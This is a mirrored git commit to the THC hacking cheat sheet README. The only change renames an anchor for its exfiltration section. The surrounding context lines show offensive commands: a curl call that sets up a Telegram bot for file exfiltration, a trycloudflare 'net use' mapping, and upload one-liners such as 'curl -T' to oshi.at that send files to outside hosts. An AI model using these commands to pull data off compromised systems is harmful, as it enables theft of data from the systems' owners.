mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-05-23 16:09:42 +02:00
Update README.md
This commit is contained in:
@@ -902,7 +902,7 @@ net use * \\example-foo-bar-lights.trycloudflare.com@SSL\sources
|
||||
<a id="tg"></a>
|
||||
### 4.vi. File transfer to Telegram
|
||||
|
||||
There are [zillions of upload services](#exfil) but TG is a neat alternative. Get a _TG-Bot-Token_ from the [TG BotFather](https://www.siteguarding.com/en/how-to-get-telegram-bot-api-token). Then create a new TG group and add your bot to the group. Retrieve the _chat_id_ of that group:
|
||||
There are [zillions of upload services](#cloudexfil) but TG is a neat alternative. Get a _TG-Bot-Token_ from the [TG BotFather](https://www.siteguarding.com/en/how-to-get-telegram-bot-api-token). Then create a new TG group and add your bot to the group. Retrieve the _chat_id_ of that group:
|
||||
```
|
||||
curl -s "https://api.telegram.org/bot<TG-BOT-TOKEN>/getUpdates" | jq -r '.result[].message.chat.id' | uniq
|
||||
```
|
||||
@@ -1562,7 +1562,7 @@ Tunneling
|
||||
1. [TCP Gender Changer](https://tgcd.sourceforge.net/) for all your 'connect back' needs.
|
||||
1. [ngrok](https://ngrok.com/download), [cloudflared](https://developers.cloudflare.com/cloudflare-one/connections/connect-apps) or [pagekite](https://pagekite.net/) to make a server behind NAT accessible from the public Internet.
|
||||
|
||||
Exfil<a id="exfil"></a>
|
||||
Exfil<a id="cloudexfil"></a>
|
||||
1. [Blitz](https://github.com/hackerschoice/gsocket#blitz) - `blitz -l` / `blitz foo.txt`
|
||||
1. [Mega](https://mega.io/cmd)
|
||||
2. [oshiAt](https://oshi.at/) - also on TOR. `curl -T foo.txt https://oshi.at`
|
||||
|
||||
Reference in New Issue
Block a user